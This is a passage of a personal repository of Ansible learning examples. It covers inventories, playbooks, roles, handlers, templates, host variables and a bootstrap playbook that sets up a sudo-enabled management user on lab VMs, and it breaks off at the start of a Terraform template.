-------------------------------------------------------------------------------- 1 | [defaults] 2 | inventory = ./hosts 3 | # TODO: You need to have this file 4 | private_key_file = ~/.ssh/ansible 5 | interpreter_python = auto_silent -------------------------------------------------------------------------------- /IaC/Ansible/examples/15.roles/hosts: -------------------------------------------------------------------------------- 1 | # =================================================================== 2 | 3 | # Group of servers, can have any name 4 | [servers] 5 | 192.168.10.78 6 | 192.168.10.79 7 | 192.168.10.77 8 | 9 | # =================================================================== 10 | 11 | # Vars for all machines that this group have 12 | [servers:vars] 13 | 14 | # User username 15 | ansible_user=vm 16 | 17 | # For sudo privileges password (see also in playbook become: true) 18 | # This is NOTErecommended 19 | ansible_become_pass=vm 20 | 21 | # =================================================================== 22 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/15.roles/playbook.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - hosts: all 3 | become: true 4 | roles: 5 | - base 6 | 7 | - hosts: all 8 | become: true 9 | roles: 10 | - servers -------------------------------------------------------------------------------- /IaC/Ansible/examples/15.roles/roles/base/tasks/main.yml: -------------------------------------------------------------------------------- 1 | - name: Update packages (Debian) 2 | when: ansible_distribution in ["Ubuntu", "Debian"] 3 | tags: ubuntu,packages 4 | apt: 5 | update_cache: yes 6 | 7 | - name: Update packages (Red Hat) 8 | when: ansible_distribution in ["Fedora", "CentOS"] 9 | tags: redhat,packages 10 | dnf: 11 | update_cache: yes -------------------------------------------------------------------------------- /IaC/Ansible/examples/15.roles/roles/servers/files/dummy-file-from-roles-example: -------------------------------------------------------------------------------- 1 | an empty file -------------------------------------------------------------------------------- /IaC/Ansible/examples/15.roles/roles/servers/tasks/main.yml: -------------------------------------------------------------------------------- 1 | - name: Install packages (Debian) 2 | when: ansible_distribution in ["Ubuntu", "Debian"] 3 | apt: 4 | update_cache: true 5 | name: 6 | - apache2 7 | state: latest 8 | 9 | - name: Install packages (Red Hat) 10 | when: ansible_distribution in ["Fedora", "CentOS"] 11 | dnf: 12 | update_cache: true 13 | name: 14 | - httpd 15 | state: latest 16 | 17 | 18 | - name: Copy file to servers 19 | copy: 20 | src: dummy-file-from-roles-example 21 | dest: /home/vm/dummy-file-from-roles-example 22 | owner: vm 23 | group: vm 24 | mode: 0644 -------------------------------------------------------------------------------- /IaC/Ansible/examples/15.roles/run-playbook.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | ansible-playbook playbook.yml 4 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/16.host_vars/README.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | ``` 5 | . 6 | ├── ansible.cfg 7 | ├── hosts 8 | │ └── servers 9 | ├── host_vars 10 | │ ├── 192.168.10.77.yml 11 | │ ├── 192.168.10.78.yml 12 | │ └── 192.168.10.79.yml 13 | └── playbook.yml 14 | ``` 15 | 16 | Inside `host_vars` the name of the yml files 17 | should be the same as in the inventory file -------------------------------------------------------------------------------- /IaC/Ansible/examples/16.host_vars/ansible.cfg: -------------------------------------------------------------------------------- 1 | [defaults] 2 | inventory = ./hosts/servers 3 | private_key_file = ~/.ssh/ansible 4 | interpreter_python = auto_silent -------------------------------------------------------------------------------- /IaC/Ansible/examples/16.host_vars/host_vars/192.168.10.77.yml: -------------------------------------------------------------------------------- 1 | host_var_specific_to_this: This_server_is_77 -------------------------------------------------------------------------------- /IaC/Ansible/examples/16.host_vars/host_vars/192.168.10.78.yml: -------------------------------------------------------------------------------- 1 | host_var_specific_to_this: This_server_is_78 2 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/16.host_vars/host_vars/192.168.10.79.yml: -------------------------------------------------------------------------------- 1 | host_var_specific_to_this: This_server_is_79 2 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/16.host_vars/hosts/servers: -------------------------------------------------------------------------------- 1 | [servers] 2 | 192.168.10.78 3 | 192.168.10.79 4 | 192.168.10.77 5 | 6 | [servers:vars] 7 | ansible_user=vm 8 | 9 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/16.host_vars/playbook.yml: -------------------------------------------------------------------------------- 1 | --- 2 | # Installation 3 | - hosts: all 4 | tasks: 5 | - name: Display message with variables 6 | debug: 7 | msg: "host_var_specific_to_this: {{ host_var_specific_to_this }}, IP: {{ ansible_default_ipv4.address }}" 8 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/16.host_vars/run-playbook.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | ansible-playbook playbook.yml 4 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/17.handlers/ansible.cfg: -------------------------------------------------------------------------------- 1 | [defaults] 2 | inventory = ./hosts 3 | # TODO: You need to have this file 4 | private_key_file = ~/.ssh/ansible 5 | interpreter_python = auto_silent -------------------------------------------------------------------------------- /IaC/Ansible/examples/17.handlers/handlers.yml: -------------------------------------------------------------------------------- 1 | # The name of the handler task, should be the same 2 | # as the reference used during `notify` 3 | - name: trigger-demo-handler 4 | debug: 5 | msg: "Handler was triggered" -------------------------------------------------------------------------------- /IaC/Ansible/examples/17.handlers/hosts: -------------------------------------------------------------------------------- 1 | [servers] 2 | 192.168.10.78 3 | 192.168.10.77 4 | 5 | [servers:vars] 6 | ansible_user=vm 7 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/17.handlers/playbook.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - hosts: all 3 | 4 | handlers: 5 | - import_tasks: handlers.yml 6 | 7 | tasks: 8 | - name: This task will trigger handler 9 | debug: 10 | msg: "Trigger handler..." 11 | # This tell Ansible that this task should be marked as "changed" no matter what happens. 12 | changed_when: true 13 | 14 | # This is required to trigger handler 15 | # REMEMBER! This will be triggered, only 16 | # if a change occured, for this reason, in this example 17 | # changed_when: true is used 18 | notify: trigger-demo-handler 19 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/17.handlers/run-playbook.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | ansible-playbook playbook.yml 4 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/18.templates/ansible.cfg: -------------------------------------------------------------------------------- 1 | [defaults] 2 | inventory = ./hosts 3 | # TODO: You need to have this file 4 | private_key_file = ~/.ssh/ansible 5 | interpreter_python = auto_silent -------------------------------------------------------------------------------- /IaC/Ansible/examples/18.templates/hosts: -------------------------------------------------------------------------------- 1 | [servers] 2 | 192.168.10.78 3 | 192.168.10.77 4 | 5 | [servers:vars] 6 | ansible_user=vm 7 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/18.templates/playbook.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - hosts: all 3 | vars: 4 | template_dummy_variable: "this is a dummy variable to test templates" 5 | 6 | tasks: 7 | - name: Some kind of name 8 | template: 9 | src: "dummy-template.j2" 10 | dest: "/home/vm/dummy-template.txt" 11 | owner: vm 12 | group: vm 13 | mode: 0644 14 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/18.templates/run-playbook.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | ansible-playbook playbook.yml 4 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/18.templates/templates/dummy-template.j2: -------------------------------------------------------------------------------- 1 | Some random value: {{ template_dummy_variable }} -------------------------------------------------------------------------------- /IaC/Ansible/examples/2.become-sudo/RUNME: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | ## ======================================================================================= 4 | ## Update packages list 5 | ## ======================================================================================= 6 | 7 | ansible all -m apt -a update_cache=true --become --ask-become-pass 8 | 9 | # Command explaination 10 | # -m 11 | # -a 12 | # --become 13 | # --ask-become-pass 14 | 15 | # i.e. 16 | # -m apt -a update_cache --> is the same as running: `sudo apt update` on a Debian system 17 | 18 | ## ======================================================================================= 19 | ## Install all updates 20 | ## ======================================================================================= 21 | 22 | # ansible all -m apt -a "upgrade=dist" --become --ask-become-pass 23 | 24 | ## ======================================================================================= 25 | ## Install application 26 | ## ======================================================================================= 27 | 28 | # Install nox version of vim 29 | ansible all -m apt -a "name=figlet state=latest" --become --ask-become-pass 30 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/2.become-sudo/ansible.cfg: -------------------------------------------------------------------------------- 1 | [defaults] 2 | inventory = ./servers 3 | # TODO: You need to have this file 4 | private_key_file = ~/.ssh/ansible 5 | interpreter_python=auto_silent -------------------------------------------------------------------------------- /IaC/Ansible/examples/2.become-sudo/servers: -------------------------------------------------------------------------------- 1 | [servers] 2 | 3 | # Server 1 IP 4 | 192.168.10.89 ansible_user=vm 5 | 6 | # Server 2 IP 7 | 192.168.10.98 ansible_user=vm 8 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/3.first-playbook/RUNME: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | ansible-playbook --ask-become-pass remove_package.yml 4 | ansible-playbook --ask-become-pass install_package.yml 5 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/3.first-playbook/ansible.cfg: -------------------------------------------------------------------------------- 1 | [defaults] 2 | inventory = ./servers 3 | # TODO: You need to have this file 4 | private_key_file = ~/.ssh/ansible 5 | interpreter_python=auto_silent -------------------------------------------------------------------------------- /IaC/Ansible/examples/3.first-playbook/install_package.yml: -------------------------------------------------------------------------------- 1 | --- 2 | # SPACING MATTERS! 3 | - name: Install package 4 | hosts: servers # Can be one of the groups defined in servers file 5 | become: true # Become sudo user 6 | 7 | tasks: 8 | - name: Update index 9 | apt: 10 | update_cache: yes 11 | 12 | - name: Install figlet 13 | apt: 14 | name: figlet 15 | state: latest -------------------------------------------------------------------------------- /IaC/Ansible/examples/3.first-playbook/remove_package.yml: -------------------------------------------------------------------------------- 1 | --- 2 | # SPACING MATTERS! 3 | - name: Remove package 4 | hosts: servers # Can be one of the groups defined in servers file 5 | become: true # Become sudo user 6 | 7 | tasks: 8 | - name: Remove figlet 9 | apt: 10 | name: figlet 11 | state: absent -------------------------------------------------------------------------------- /IaC/Ansible/examples/3.first-playbook/servers: -------------------------------------------------------------------------------- 1 | [servers] 2 | 3 | # Server 1 IP 4 | 192.168.10.79 ansible_user=vm 5 | 6 | # Server 2 IP 7 | 192.168.10.78 ansible_user=vm 8 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/4.debug-and-logs/ansible.cfg: -------------------------------------------------------------------------------- 1 | [defaults] 2 | inventory = ./hosts 3 | # TODO: You need to have this file 4 | private_key_file = ~/.ssh/ansible 5 | interpreter_python = auto_silent 6 | 7 | # Set the default verbosity (2: same as -vv) 8 | verbosity = 2 -------------------------------------------------------------------------------- /IaC/Ansible/examples/4.debug-and-logs/dummy-playbook.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - name: A dummy playbook 3 | hosts: servers # Can be one of the groups defined in ./host files 4 | become: true # Become sudo user 5 | tasks: 6 | 7 | # Option 1 8 | - name: Print a custom message 9 | debug: 10 | msg: "Print a custom message" 11 | 12 | # Option 2 13 | - name: Print a variable 14 | debug: 15 | var: ansible_default_ipv4.address 16 | 17 | # Option 3 18 | - name: Display message with variables 19 | debug: 20 | msg: "Interface: {{ ansible_default_ipv4.interface }}, IP: {{ ansible_default_ipv4.address }}" 21 | 22 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/4.debug-and-logs/hosts: -------------------------------------------------------------------------------- 1 | # =================================================================== 2 | 3 | # Group of servers, can have any name 4 | [servers] 5 | 6 | # Server 1 IP 7 | 192.168.10.78 8 | 9 | # Server 2 IP 10 | 192.168.10.79 11 | 12 | 13 | # =================================================================== 14 | 15 | # Vars for all machines that this group have 16 | [servers:vars] 17 | 18 | # User username 19 | ansible_user=vm 20 | 21 | # User password (NOT recommended for production, better use SSH key) 22 | # ansible_ssh_pass=vm 23 | 24 | # For sudo privileges password (see also in playbook become: true) 25 | # This is NOTE recommended 26 | ansible_become_pass=vm 27 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/4.debug-and-logs/run-playbook.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | ansible-playbook dummy-playbook.yml -------------------------------------------------------------------------------- /IaC/Ansible/examples/5.playbook-and-become/ansible.cfg: -------------------------------------------------------------------------------- 1 | [defaults] 2 | inventory = ./hosts 3 | # TODO: You need to have this file 4 | private_key_file = ~/.ssh/ansible 5 | interpreter_python=auto_silent -------------------------------------------------------------------------------- /IaC/Ansible/examples/5.playbook-and-become/dummy-playbook.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - name: A dummy playbook 3 | hosts: servers # Can be one of the groups defined in ./host files 4 | become: true # Become sudo user 5 | tasks: 6 | - name: ensure nano is there 7 | apt: # This is a module 8 | name: nano 9 | state: latest -------------------------------------------------------------------------------- /IaC/Ansible/examples/5.playbook-and-become/hosts: -------------------------------------------------------------------------------- 1 | # =================================================================== 2 | 3 | # Group of servers, can have any name 4 | [servers] 5 | 6 | # Server 1 IP 7 | 192.168.10.78 8 | 9 | # Server 2 IP 10 | 192.168.10.79 11 | 12 | 13 | # =================================================================== 14 | 15 | # Vars for all machines that this group have 16 | [servers:vars] 17 | 18 | # User username 19 | ansible_user=vm 20 | 21 | # User password (NOT recommended for production, better use SSH key) 22 | # ansible_ssh_pass=vm 23 | 24 | # For sudo privileges password (see also in playbook become: true) 25 | # This is NOTE recommended 26 | ansible_become_pass=vm 27 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/5.playbook-and-become/run-playbook.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | ansible-playbook dummy-playbook.yml -------------------------------------------------------------------------------- /IaC/Ansible/examples/6.multiple-distros/ansible.cfg: -------------------------------------------------------------------------------- 1 | [defaults] 2 | inventory = ./hosts 3 | # TODO: You need to have this file 4 | private_key_file = ~/.ssh/ansible 5 | interpreter_python=auto_silent -------------------------------------------------------------------------------- /IaC/Ansible/examples/6.multiple-distros/dummy-playbook.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - name: A dummy playbook 3 | hosts: servers # Can be one of the groups defined in ./host files 4 | become: true # Become sudo user 5 | tasks: 6 | - name: Update cache 7 | when: ansible_distribution in ["Debian", "Ubuntu"] 8 | apt: # This is a module 9 | update_cache: yes 10 | 11 | - name: ensure nano is there 12 | when: ansible_distribution == "Ubuntu" 13 | apt: # This is a module 14 | name: nano 15 | state: latest -------------------------------------------------------------------------------- /IaC/Ansible/examples/6.multiple-distros/hosts: -------------------------------------------------------------------------------- 1 | # =================================================================== 2 | 3 | # Group of servers, can have any name 4 | [servers] 5 | 6 | # Server 1 IP 7 | 192.168.10.78 8 | 9 | # Server 2 IP 10 | 192.168.10.79 11 | 12 | 13 | # =================================================================== 14 | 15 | # Vars for all machines that this group have 16 | [servers:vars] 17 | 18 | # User username 19 | ansible_user=vm 20 | 21 | # User password (NOT recommended for production, better use SSH key) 22 | # ansible_ssh_pass=vm 23 | 24 | # For sudo privileges password (see also in playbook become: true) 25 | # This is NOTE recommended 26 | ansible_become_pass=vm 27 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/6.multiple-distros/run-playbook.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | ansible-playbook dummy-playbook.yml -------------------------------------------------------------------------------- /IaC/Ansible/examples/7.improve-playbooks-combine-tasks/ansible.cfg: -------------------------------------------------------------------------------- 1 | [defaults] 2 | inventory = ./hosts 3 | # TODO: You need to have this file 4 | private_key_file = ~/.ssh/ansible 5 | interpreter_python=auto_silent -------------------------------------------------------------------------------- /IaC/Ansible/examples/7.improve-playbooks-combine-tasks/dummy-playbook.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - name: A dummy playbook 3 | hosts: servers # Can be one of the groups defined in ./host files 4 | become: true # Become sudo user 5 | tasks: 6 | 7 | # ---------------------------------------------- 8 | # Debian based distributions 9 | - name: Debian - Ensure that packages are installed 10 | when: ansible_distribution in ["Ubuntu", "Debian"] 11 | apt: 12 | update_cache: yes # Combine cache update with the installation 13 | name: 14 | - nano 15 | - tmux 16 | - vim 17 | state: latest 18 | 19 | # ---------------------------------------------- 20 | # Red Hat distributions 21 | - name: Red Hat - Ensure that packages are installed 22 | when: ansible_distribution in ["Fedora", "CentOS"] 23 | dnf: 24 | update_cache: yes # Combine cache update with the installation 25 | name: 26 | - nano 27 | - tmux 28 | - vim 29 | state: latest -------------------------------------------------------------------------------- /IaC/Ansible/examples/7.improve-playbooks-combine-tasks/hosts: -------------------------------------------------------------------------------- 1 | # =================================================================== 2 | 3 | # Group of servers, can have any name 4 | [servers] 5 | 6 | # Server 1 IP 7 | 192.168.10.78 8 | 9 | # Server 2 IP 10 | 192.168.10.79 11 | 12 | 13 | # =================================================================== 14 | 15 | # Vars for all machines that this group have 16 | [servers:vars] 17 | 18 | # User username 19 | ansible_user=vm 20 | 21 | # User password (NOT recommended for production, better use SSH key) 22 | # ansible_ssh_pass=vm 23 | 24 | # For sudo privileges password (see also in playbook become: true) 25 | # This is NOTE recommended 26 | ansible_become_pass=vm 27 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/7.improve-playbooks-combine-tasks/run-playbook.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | ansible-playbook dummy-playbook.yml -------------------------------------------------------------------------------- /IaC/Ansible/examples/8.improve-playbooks-use-variables/ansible.cfg: -------------------------------------------------------------------------------- 1 | [defaults] 2 | inventory = ./hosts 3 | # TODO: You need to have this file 4 | private_key_file = ~/.ssh/ansible 5 | interpreter_python=auto_silent -------------------------------------------------------------------------------- /IaC/Ansible/examples/8.improve-playbooks-use-variables/dummy-playbook.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - name: A dummy playbook 3 | hosts: servers # Can be one of the groups defined in ./host files 4 | become: true # Become sudo user 5 | tasks: 6 | 7 | - name: Ensure that packages are installed 8 | when: ansible_distribution in ["Ubuntu", "Debian"] 9 | package: # package is a generic package manager (it will user whatever package manager used, e.g. pacman, apt, dnf) 10 | update_cache: yes # Combine cache update with the installation 11 | name: 12 | - nano 13 | - tmux 14 | - vim 15 | - "{{ apache_package }}" # See hosts 16 | state: latest 17 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/8.improve-playbooks-use-variables/hosts: -------------------------------------------------------------------------------- 1 | # =================================================================== 2 | 3 | # Group of servers, can have any name 4 | [servers:children] 5 | debianservers 6 | redhatservers 7 | 8 | 9 | [debianservers] 10 | # Server 1 IP 11 | 192.168.10.78 12 | 13 | # Server 2 IP 14 | 192.168.10.79 15 | 16 | [redhatservers] 17 | 192.168.10.77 18 | 19 | # =================================================================== 20 | 21 | # Vars for all machines that this group have 22 | [servers:vars] 23 | 24 | # User username 25 | ansible_user=vm 26 | 27 | # User password (NOT recommended for production, better use SSH key) 28 | # ansible_ssh_pass=vm 29 | 30 | # For sudo privileges password (see also in playbook become: true) 31 | # This is NOTErecommended 32 | ansible_become_pass=vm 33 | 34 | # =================================================================== 35 | 36 | [debianservers:vars] 37 | apache_package = apache2 38 | 39 | [redhatservers:vars] 40 | apache_package = httpd 41 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/8.improve-playbooks-use-variables/run-playbook.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | ansible-playbook dummy-playbook.yml -------------------------------------------------------------------------------- /IaC/Ansible/examples/9.groups-target-nodes/ansible.cfg: -------------------------------------------------------------------------------- 1 | [defaults] 2 | inventory = ./hosts 3 | # TODO: You need to have this file 4 | private_key_file = ~/.ssh/ansible 5 | interpreter_python=auto_silent -------------------------------------------------------------------------------- /IaC/Ansible/examples/9.groups-target-nodes/dummy-playbook.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - name: Debian install packages 3 | hosts: debianservers # Can be one of the groups defined in ./host files 4 | become: true # Become sudo user 5 | tasks: 6 | - name: Ensure that packages are installed 7 | when: ansible_distribution in ["Ubuntu", "Debian"] 8 | apt: 9 | update_cache: yes # Combine cache update with the installation 10 | name: 11 | - nano 12 | - tmux 13 | - vim 14 | - apache2 15 | state: latest 16 | 17 | 18 | - name: Red Hat install packages 19 | hosts: redhatservers # Can be one of the groups defined in ./host files 20 | become: true # Become sudo user 21 | tasks: 22 | 23 | - name: Ensure that packages are installed 24 | when: ansible_distribution == "Fedora" 25 | dnf: 26 | update_cache: yes # Combine cache update with the installation 27 | name: 28 | - python3-libdnf5 29 | - httpd 30 | state: latest 31 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/9.groups-target-nodes/hosts: -------------------------------------------------------------------------------- 1 | # =================================================================== 2 | 3 | # Group of servers, can have any name 4 | [servers:children] 5 | debianservers 6 | redhatservers 7 | 8 | [debianservers] 9 | # Server 1 IP 10 | 192.168.10.78 11 | 12 | # Server 2 IP 13 | 192.168.10.79 14 | 15 | [redhatservers] 16 | 192.168.10.77 17 | 18 | # =================================================================== 19 | 20 | # Vars for all machines that this group have 21 | [servers:vars] 22 | 23 | # User username 24 | ansible_user=vm 25 | 26 | # User password (NOT recommended for production, better use SSH key) 27 | # ansible_ssh_pass=vm 28 | 29 | # For sudo privileges password (see also in playbook become: true) 30 | # This is NOTErecommended 31 | ansible_become_pass=vm 32 | 33 | # =================================================================== 34 | 35 | [debianservers:vars] 36 | apache_package = apache2 37 | 38 | [redhatservers:vars] 39 | apache_package = httpd 40 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/9.groups-target-nodes/run-playbook.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | ansible-playbook dummy-playbook.yml -------------------------------------------------------------------------------- /IaC/Ansible/structure-template/README.md: -------------------------------------------------------------------------------- 1 | # Ansible structure template 2 | 3 | What is contains 4 | - Files 5 | - Handlers 6 | - Group, Host vars, vars 7 | - Roles 8 | - Templates 9 | - Playbook 10 | - Inventories 11 | - Conditions 12 | - Loops 13 | - Files/Copy 14 | - Package managers, Services -------------------------------------------------------------------------------- /IaC/Ansible/structure-template/RUN_BOOTSTRAP: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # First initiate the environment 4 | ansible-playbook --ask-become-pass bootstrap.yml 5 | 6 | # Then you can run playbooks like this one 7 | ansible-playbook bootstrap_complete.yml -------------------------------------------------------------------------------- /IaC/Ansible/structure-template/ansible.cfg: -------------------------------------------------------------------------------- 1 | [defaults] 2 | # Either ini or yml file format 3 | # inventory = ./hosts/servers.ini 4 | inventory = ./hosts/servers.yml 5 | 6 | private_key_file = ~/.ssh/ansible 7 | interpreter_python = auto_silent 8 | 9 | # Num of processes run an the same time 10 | forks = 3 11 | 12 | # Logs file 13 | log_path = ./logs/ansible-logs.txt 14 | 15 | [privilege_escalation] 16 | # If we need to have root privileges 17 | # become = true 18 | # become_method = sudo 19 | # ask_become_pass = true -------------------------------------------------------------------------------- /IaC/Ansible/structure-template/bootstrap.yml: -------------------------------------------------------------------------------- 1 | --- 2 | # =========================================================================================================== 3 | # BOOTSTRAP PROCESS 4 | # =========================================================================================================== 5 | 6 | - hosts: all 7 | become: true 8 | 9 | # [IMPORTANT] This is the SSH user 10 | vars: 11 | ansible_user : "vm" 12 | 13 | pre_tasks: 14 | # ======================================================== 15 | # Make sure that the system has all updates 16 | # THis is not mandatory, but is a good practice 17 | - name: Update packages (Debian) 18 | # This is a condition 19 | when: ansible_distribution in ["Ubuntu", "Debian"] 20 | apt: 21 | update_cache: yes 22 | 23 | - name: Update packages (Red Hat) 24 | # This is a condition 25 | when: ansible_distribution in ["Fedora", "CentOS"] 26 | dnf: 27 | update_cache: yes 28 | # ======================================================== 29 | 30 | 31 | # ======================================================== 32 | # Create sudo user 33 | # Instead of using the ssh user for sudo access, create a local user 34 | # which will have sudo privileges, this way we do not need to pass 35 | 36 | - name: Create sudo user that will handle operations 37 | user: 38 | name: mrmachine2 39 | groups: root 40 | 41 | - name: Add sudo privileges to user with password prompt 42 | lineinfile: 43 | path: /etc/sudoers.d/mrmachine2 44 | line: "mrmachine2 ALL=(ALL) NOPASSWD:ALL" 45 | create: yes 46 | mode: '0440' 47 | 48 | - name: Add SSH key for user 49 | authorized_key: 50 | user: mrmachine2 51 | key: "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPpCBoxrn+mROgjyVxRTxmH76gLwPCdkkcYbKjFHEswC ansible" 52 | 53 | # ======================================================== 54 | # Login message added to inform users that this server is managed by ansible 55 | - name: Create Message of the Day file 56 | copy: 57 | content: "THIS MACHINE IS MANAGED BY ANSIBLE! PLEASE CONTACT SYSTEM ADMINISTRATOR FOR MODIFICATIONS" 58 | dest: /etc/motd -------------------------------------------------------------------------------- /IaC/Ansible/structure-template/bootstrap_complete.yml: -------------------------------------------------------------------------------- 1 | --- 2 | # =========================================================================================================== 3 | # EXAMPLE OF ALL OTHER PLAYBOOKS 4 | # =========================================================================================================== 5 | - hosts: all 6 | become: true 7 | 8 | # [IMPORTANT] This is the 'local' user 9 | vars: 10 | ansible_user : "mrmachine2" 11 | 12 | tasks: 13 | 14 | # Keep this play here, because you may need in the future to remove or update your key 15 | - name: Add SSH key for user 16 | authorized_key: 17 | user: mrmachine2 18 | key: "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPpCBoxrn+mROgjyVxRTxmH76gLwPCdkkcYbKjFHEswC ansible" 19 | 20 | # Install packages (use loop) 21 | - name: Install packages 22 | package: 23 | update_cache: yes 24 | name: "{{ item }}" 25 | loop: 26 | - figlet 27 | - git 28 | - tmux -------------------------------------------------------------------------------- /IaC/Ansible/structure-template/files/root-dummy-file: -------------------------------------------------------------------------------- 1 | root dummy file -------------------------------------------------------------------------------- /IaC/Ansible/structure-template/group_vars/all: -------------------------------------------------------------------------------- 1 | group_name: -------------------------------------------------------------------------------- /IaC/Ansible/structure-template/group_vars/servers.yml: -------------------------------------------------------------------------------- 1 | group_name: group name is servers -------------------------------------------------------------------------------- /IaC/Ansible/structure-template/handlers/main.yml: -------------------------------------------------------------------------------- 1 | # The name of the handler task, should be the same 2 | # as the reference used during `notify` 3 | - name: root-level-trigger-demo-handler 4 | debug: 5 | msg: "Root level handler was triggered" -------------------------------------------------------------------------------- /IaC/Ansible/structure-template/host_vars/192.168.10.77.yml: -------------------------------------------------------------------------------- 1 | host_var_specific_to_this: This_server_is_77 -------------------------------------------------------------------------------- /IaC/Ansible/structure-template/host_vars/ansible-test-server-1.yml: -------------------------------------------------------------------------------- 1 | ansible_host: 192.168.10.46 2 | host_var_specific_to_this: This_server_is_46 -------------------------------------------------------------------------------- /IaC/Ansible/structure-template/host_vars/ansible-test-server-2.yml: -------------------------------------------------------------------------------- 1 | ansible_host: 192.168.10.47 2 | host_var_specific_to_this: This_server_is_47 -------------------------------------------------------------------------------- /IaC/Ansible/structure-template/hosts/servers.ini: -------------------------------------------------------------------------------- 1 | [servers] 2 | # These are just declarations, but could also be IP or domain names 3 | # See host_vars for actual IPs 4 | ansible-test-server-1 5 | ansible-test-server-2 6 | 7 | [servers:vars] 8 | ansible_user=vm 9 | 10 | -------------------------------------------------------------------------------- /IaC/Ansible/structure-template/hosts/servers.yml: -------------------------------------------------------------------------------- 1 | # ----------------------------------------- 2 | # Option 1: 3 | # all: 4 | # children: 5 | # servers: 6 | # hosts: 7 | # # These are just declarations, but could also be IP or domain names 8 | # # See host_vars for actual 9 | # ansible-test-server-1: 10 | # ansible-test-server-2: 11 | # vars: 12 | # ansible_user: vm 13 | 14 | # ----------------------------------------- 15 | # Option 2: 16 | all: 17 | # A. First declare hosts 18 | hosts: 19 | # These are just declarations, but could also be IP or domain names 20 | # See host_vars for actual 21 | ansible-test-server-1: 22 | ansible-test-server-2: 23 | vars: 24 | ansible_user: vm 25 | 26 | # B. Then declare groups 27 | children: 28 | # Our servers group 29 | servers: 30 | ansible-test-server-1: 31 | ansible-test-server-2: 32 | 33 | # Another example 34 | group_in_group_example: 35 | children: 36 | servers: 37 | -------------------------------------------------------------------------------- /IaC/Ansible/structure-template/logs/.gitignore: -------------------------------------------------------------------------------- 1 | * 2 | !.gitignore -------------------------------------------------------------------------------- /IaC/Ansible/structure-template/roles/base/files/base-role-dummy-file: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CSpyridakis/notes/a51682b5510bc694537a0e1f12914f36d2a3a2a2/IaC/Ansible/structure-template/roles/base/files/base-role-dummy-file -------------------------------------------------------------------------------- /IaC/Ansible/structure-template/roles/base/handlers/main.yml: -------------------------------------------------------------------------------- 1 | # The name of the handler task, should be the same 2 | # as the reference used during `notify` 3 | - name: trigger-role-base-handler 4 | debug: 5 | msg: "Role base handler was triggered" -------------------------------------------------------------------------------- /IaC/Ansible/structure-template/roles/base/tasks/main.yml: -------------------------------------------------------------------------------- 1 | - name: Copy role dummy file to servers 2 | copy: 3 | src: base-role-dummy-file 4 | dest: /home/vm/base-role-dummy-file 5 | owner: vm 6 | group: vm 7 | mode: 0644 8 | 9 | # Use hostvars 10 | - name: Print a custom message from inside base role 11 | debug: 12 | msg: "This is a dummy message from host_var_specific_to_this: {{ host_var_specific_to_this }}" 13 | 14 | # Trigger role base handler 15 | - name: This task will trigger handler 16 | changed_when: true 17 | notify: trigger-role-base-handler 18 | debug: 19 | msg: "Trigger role base handler..." -------------------------------------------------------------------------------- /IaC/Ansible/structure-template/templates/dummy-root-template.j2: -------------------------------------------------------------------------------- 1 | Some random value: {{ root_level_template }} -------------------------------------------------------------------------------- /IaC/Ansible/structure-template/vars/other_variables.yml: -------------------------------------------------------------------------------- 1 | vars_file_variable: variable from inside the other_variables file -------------------------------------------------------------------------------- /IaC/Terraform/0-template/.gitignore: -------------------------------------------------------------------------------- 1 | * 2 | !*.tf 3 | !.gitignore 4 | !*.tfvars -------------------------------------------------------------------------------- /IaC/Terraform/0-template/main.tf: -------------------------------------------------------------------------------- 1 | # CAUTION: THIS IS NOT A WORKING .TF FILE. IT SHOULD ONLY BE USED AS A 2 | # REFFERENCE TO DESCRIBE TERRAFORM 